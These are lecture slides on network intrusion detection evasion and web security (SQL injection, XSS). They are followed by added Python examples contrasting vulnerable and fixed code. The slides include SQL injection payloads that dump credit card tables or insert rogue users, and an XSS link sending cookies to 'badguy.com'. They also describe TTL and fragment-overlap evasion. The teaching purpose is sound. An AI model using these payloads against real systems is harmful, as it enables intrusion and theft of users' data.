Berkeley COMPSCI 161 - Web Security

[Slide 1] Web Security
Dawn Song ([email protected])
Slides from John Mitchell

[Slide 2] NIDS: Evasion & Normalization
• Problems
– Complete fragment reassembly necessary to detect certain attacks
– NIDS only has partial knowledge of what traffic the host sees (e.g., TTL expires, MTU)
– Ambiguities in TCP/IP (e.g., overlapping IP & TCP fragments)
» Different OSes implement the standard differently

[Slide 3] Small TTL Attack
(Figure: Attacker -> Internet -> NIDS -> End host)
Attacker's data stream: A T T I A C K
NIDS sees: A T T I A C K
End host sees: A T T A C K
The inserted "I" carries the same TCP seq# as the "A" that follows it but a short TTL, so the NIDS sees it and the end host never does.

[Slide 4] Fragmentation Overlap Attack
(Figure: Attacker -> Internet -> NIDS -> End host)
Attacker's data stream: A T T A I C K, where "A" and "I" have the same TCP seq# (or the same IP fragment offset)
NIDS sees / end host sees: each side resolves the overlap by its own policy, so the two may reassemble different streams.

[Slide 5] Solution: Traffic Normalizer
(Figure: Internet -> NIDS -> Normalizer -> Host)
• Introduce a "bump in the wire": a traffic normalizer that removes protocol ambiguities
– Drop overlapping IP/TCP fragments
– Increase TTL in packets with low TTL
• Other approaches
– Host-based IDS
– Detailed intranet map

[Slide 6] Stealth Port Scanning
• IP id field used for stealth port scanning

[Slide 7] Principle: Reference Monitor
• SFI, system call interposition, VMM introspection, firewall/NIDS: one thing in common
• One enforcement mechanism: reference monitor
– Examines every request to access any controlled resource (an object) and determines whether to allow the request
(Figure: Subject -> Request -> Reference Monitor -> Object)

[Slide 8] Reference Monitor Security Properties
• Always invoked
– Complete mediation property: all security-relevant operations must be mediated by the RM
– RM should be invoked on every operation controlled by the access control policy
• Tamper-resistant
– Maintain RM integrity (no code/state tampering)
• Verifiable
– Can verify RM correctness (correctly enforces the desired access control policy)
» Requires an extremely simple RM
» Can't verify correctness for systems with any appreciable degree of complexity

[Slide 9] Web Security
• Web: new platform for many security-critical applications
– e.g., banking, e-commerce
• Web security: complex & constantly evolving
• A two-sided story
– Web application code
» Runs at the web site on a web server or app server
» Written in PHP, ASP, JSP, Ruby, …
» Question: secure web site design
– Web browser (next lecture)
» Can be attacked by any website it visits
» Attacks result in: computer compromise, malware installation, etc.
» Question: secure web browser

[Slide 10] Secure Web Site Design
• Today's web is dynamic
• Complex web applications
– Run on a web server or app server
– Take input from web users (via the web server)
– Interact with databases & 3rd parties
– Prepare results for users (via the web server)
• Examples
– Shopping carts, on-line banking, bill pay, tax prep, etc.
• Challenges
– New code written for every web site, often with little security consideration
– Many potential vulnerabilities

[Slide 11] Common Vulnerabilities
• Input validation
– SQL injection
– XSS: cross-site scripting
– HTTP response splitting
• Cookie management
– CSRF: cross-site request forgery

[Slide 12] SQL Injection

[Slide 13] Dynamic Web Application
(Figure: Browser sends "GET / HTTP/1.0" to the web server; the web server runs index.php, which queries the database server, and answers "HTTP/1.1 200 OK")

[Slide 14] Basic picture: SQL Injection
(Figure: Attacker -> Victim Server -> Victim SQL DB)
1. Attacker posts a malicious form to the victim server
2. Victim server sends an unintended query to the SQL DB
3. Attacker receives valuable data

[Slide 15] What is SQL Injection?
• Input validation vulnerability
– untrusted user input in a SQL query to the back-end database
– without sanitizing the data
• Specific case of more general command injection
– inserting untrusted input into a query or command
• Why bad?
– supplied data can be misinterpreted as a command
– could alter the intended effect of the command or query

[Slide 16] SQL Injection Example

    View pizza order history:<br>
    <form method="post" action="...">
    Month
    <select name="month">
      <option value="1">Jan</option>
      ...
      <option value="12">Dec</option>
    </select>
    Year
    <p><input type=submit name=submit value=View>
    </form>

Attacker can post a form that is not generated by this page.

[Slide 17] SQL Injection Example
Normal SQL query:

    SELECT pizza, toppings, quantity, order_day
    FROM orders
    WHERE userid=4123 AND order_month=10

For the order_month parameter, the attacker could input: 0 OR 1=1
Malicious query:

    … WHERE userid=4123 AND order_month=0 OR 1=1

The WHERE condition is always true! Gives the attacker access to other users' private data!

[Slide 18] SQL Injection Example
All user data compromised

[Slide 19] SQL Injection Example
A more damaging example: for the order_month parameter, the attacker could input

    0 AND 1=0
    UNION SELECT cardholder, number, exp_month, exp_year
    FROM creditcards

• Attacker is able to
– Combine the results of two queries
– Empty table from the first query with the sensitive credit card info of all users from the second query

[Slide 20] SQL Injection Example
Credit card info compromised

[Slide 21] More Attacks
• Create new users:

    '; INSERT INTO USERS ('uname','passwd', 'salt') VALUES ('hacker','38a74f', 3234);

• Password reset:

    '; UPDATE USERS SET [email protected] WHERE [email protected]

[Slide 22] It's not a joke---It's real
• CardSystems
– credit card payment processing company
– SQL injection attack in June 2005
– put out of business
• The attack
– 263,000 credit card #s stolen from the database
– credit card #s stored unencrypted
– 43 million credit card #s exposed

[Slide 24] Cross-Site Scripting (XSS) Attacks

[Slide 25] Basic picture: Cross-site scripting
(Figure: Attacker Website, Vulnerable Server Website, User Victim)
1. User visits web site
2. User receives malicious page
3. User clicks on link
4. Vulnerable server echoes user input
5. User's browser sends valuable data to the attacker

[Slide 26] The setup
• User input is echoed into the HTML response.
• Example: search field
– http://victim.com/search.php?term=apple
– search.php responds with:

    <HTML> <TITLE> Search Results </TITLE>
    <BODY>
    Results for <?php echo $_GET[term] ?> :
    . . .
    </BODY> </HTML>

• Is this exploitable?
(Slide credit: Dan Boneh)

[Slide 27] Bad input
• Problem: no validation of input term
• Consider link: (properly URL encoded)

    http://victim.com/search.php?term=<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>

• What if the user clicks on this link?
1. Browser goes to victim.com/search.php
2. Victim.com returns <HTML> Results for <script> … </script>
3. Browser executes the script:
» Sends badguy.com the cookie for victim.com
(Slide credit: Dan Boneh)

[Slide 28] So what?
• Why would a user click on such a link?
– Phishing email in
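The reassembly ambiguity of slides 2 to 5, as an added example that is not part of the lecture: the same overlapping segments reassembled under two plausible receiver policies, and a normalizer that drops the overlap so NIDS and end host agree. Segment offsets, payloads and function names are constructed for this illustration.

```python
# Added example (not from the lecture slides): why overlapping TCP data is
# ambiguous for a NIDS, and what the slide-5 "drop overlapping fragments"
# normalizer changes. Segments are (seq, payload) tuples; values constructed.
from typing import Dict, List, Set, Tuple

Segment = Tuple[int, str]

# Constructed stream for slide 4: "A T T A I C K" where "A" and "I" both
# claim sequence number 3. Which byte wins depends on the receiver's policy.
OVERLAPPING_STREAM: List[Segment] = [
    (0, "A"), (1, "T"), (2, "T"), (3, "A"), (3, "I"), (4, "C"), (5, "K"),
]

def reassemble(segments: List[Segment], favor_new: bool) -> str:
    """Reassemble a stream from segments in arrival order.
    favor_new=True: later data overwrites earlier data at the same offset.
    favor_new=False: the first copy is kept. Real OS stacks differ here,
    which is exactly the ambiguity a NIDS cannot resolve on its own."""
    buf: Dict[int, str] = {}
    for seq, payload in segments:
        for i, ch in enumerate(payload):
            if favor_new or (seq + i) not in buf:
                buf[seq + i] = ch
    return "".join(buf[k] for k in sorted(buf))

def is_ambiguous(segments: List[Segment]) -> bool:
    """True when the two plausible policies yield different streams."""
    return reassemble(segments, True) != reassemble(segments, False)

def normalize(segments: List[Segment]) -> List[Segment]:
    """Traffic normalizer ("bump in the wire"): drop any segment that
    overlaps data already forwarded, so NIDS and end host see one stream."""
    seen: Set[int] = set()
    out: List[Segment] = []
    for seq, payload in segments:
        offsets = range(seq, seq + len(payload))
        if any(k in seen for k in offsets):
            continue  # overlapping fragment: dropped, never reaches the host
        seen.update(offsets)
        out.append((seq, payload))
    return out
```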
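The slide-17 order query built both ways, as an added example that is not the lecture's code: the string-concatenated version beside one that validates the month and binds it as a parameter. The table layout, sample rows and function names are assumptions; the database is an in-memory SQLite instance.

```python
# Added example (not the lecture's code): the slide-17 pizza-order query built
# by string concatenation versus with validation plus a bound parameter, run
# against an in-memory SQLite table with constructed sample rows.
import sqlite3
from typing import List, Tuple

def make_db() -> sqlite3.Connection:
    """Constructed sample data: two orders for user 4123, one for user 9999."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (userid INT, pizza TEXT, toppings TEXT,"
                 " quantity INT, order_month INT, order_day INT)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?, ?, ?, ?)", [
        (4123, "margherita", "basil", 1, 10, 3),
        (4123, "funghi", "mushroom", 2, 9, 14),
        (9999, "diavola", "salami", 1, 10, 21),  # another user's private row
    ])
    return conn

def orders_vulnerable(conn: sqlite3.Connection, userid: int,
                      order_month: str) -> List[Tuple]:
    """Untrusted input is pasted into the SQL text, so the slide's
    "0 OR 1=1" becomes part of the WHERE clause and matches every row."""
    sql = ("SELECT pizza, toppings, quantity, order_day FROM orders "
           f"WHERE userid={userid} AND order_month={order_month}")
    return conn.execute(sql).fetchall()

def is_valid_month(order_month: str) -> bool:
    """Allow-list check: the form only ever sends the integers 1..12."""
    return order_month.isdigit() and 1 <= int(order_month) <= 12

def orders_safe(conn: sqlite3.Connection, userid: int,
                order_month: str) -> List[Tuple]:
    """Validate first, then bind: the driver passes the value to the database
    separately from the SQL text, so it can never be parsed as SQL."""
    if not is_valid_month(order_month):
        raise ValueError("order_month must be an integer in 1..12")
    sql = ("SELECT pizza, toppings, quantity, order_day FROM orders "
           "WHERE userid=? AND order_month=?")
    return conn.execute(sql, (userid, int(order_month))).fetchall()
```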
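The search page of slides 26 and 27 rendered without and with output encoding, as an added example that is not the lecture's PHP: the page skeleton, the helper names and the parser check are constructed, and the slide's link is reproduced only as the test input.

```python
# Added example (not the lecture's PHP): the search.php response from slide 26
# rendered without and with output encoding, using the slide-27 link as
# constructed input and a small parser to check whether a <script> tag survives.
import html
from html.parser import HTMLParser
from urllib.parse import quote, unquote

# Same page skeleton as the slide; {term} is where `<?php echo $_GET[term] ?>` sat.
TEMPLATE = ("<HTML> <TITLE> Search Results </TITLE>\n<BODY>\n"
            "Results for {term} :\n. . .\n</BODY> </HTML>")

# The slide-27 link, URL-encoded the way a browser would send it (constructed).
ATTACK_URL = "http://victim.com/search.php?term=" + quote(
    '<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>')

def term_from_query(url: str) -> str:
    """Recover the decoded `term` parameter, as $_GET['term'] would hold it."""
    query = url.split("?", 1)[1] if "?" in url else ""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "term":
            return unquote(value)
    return ""

def render_vulnerable(term: str) -> str:
    """Echoes the raw term: markup in the input becomes markup in the page."""
    return TEMPLATE.format(term=term)

def render_safe(term: str) -> str:
    """Output encoding (PHP's htmlspecialchars does the same): <, >, &, quotes
    become entities, so the term is displayed as text, not parsed as HTML."""
    return TEMPLATE.format(term=html.escape(term, quote=True))

class _ScriptCounter(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.count = 0
    def handle_starttag(self, tag, attrs) -> None:
        if tag == "script":
            self.count += 1

def script_tag_count(page: str) -> int:
    """How many real <script> elements an HTML parser finds in the page."""
    parser = _ScriptCounter()
    parser.feed(page)
    return parser.count
```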

